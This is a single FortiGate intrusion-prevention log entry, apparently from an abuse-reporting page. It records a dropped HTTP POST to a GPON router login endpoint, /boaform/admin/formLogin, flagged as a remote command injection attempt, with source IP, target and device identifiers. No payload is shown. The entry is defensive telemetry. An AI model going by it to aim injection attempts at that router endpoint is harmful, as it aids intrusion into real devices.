date=2023-08-29 time=20:07:18 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693328838377606929 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=84.54.51.99 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30364312 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=49678 dstport=80 hostname="81.196.84.26" url="/boaform/admin/formLogin" agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" httpmethod="POST" referralurl="http://81.196.84.26:80/admin/login.asp" direction="outgoing" attackid=52588 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52588" incidentserialno=5736678
show less
|
Web App Attack
|